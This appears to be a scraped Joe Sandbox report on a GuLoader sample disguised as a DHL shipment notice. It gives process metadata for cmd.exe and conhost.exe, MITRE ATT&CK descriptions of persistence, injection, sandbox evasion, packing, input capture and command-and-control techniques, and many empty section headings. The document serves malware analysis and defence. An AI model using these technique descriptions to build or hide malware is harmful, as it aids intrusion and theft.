Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0xd30000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6244 Parent PID: 3288

General

Start time:	19:26:24
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff64fb60000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DHL Express shipment notification.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposesand to support other malicious activities, including distraction, hacktivism, and extortion.
Tactics:	Impact
Data Sources:	Netflow/Enclave netflow, Network device logs, Network intrusion detection system, Network protocol analysis, SSL/TLS inspection, Web application firewall logs, Web logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre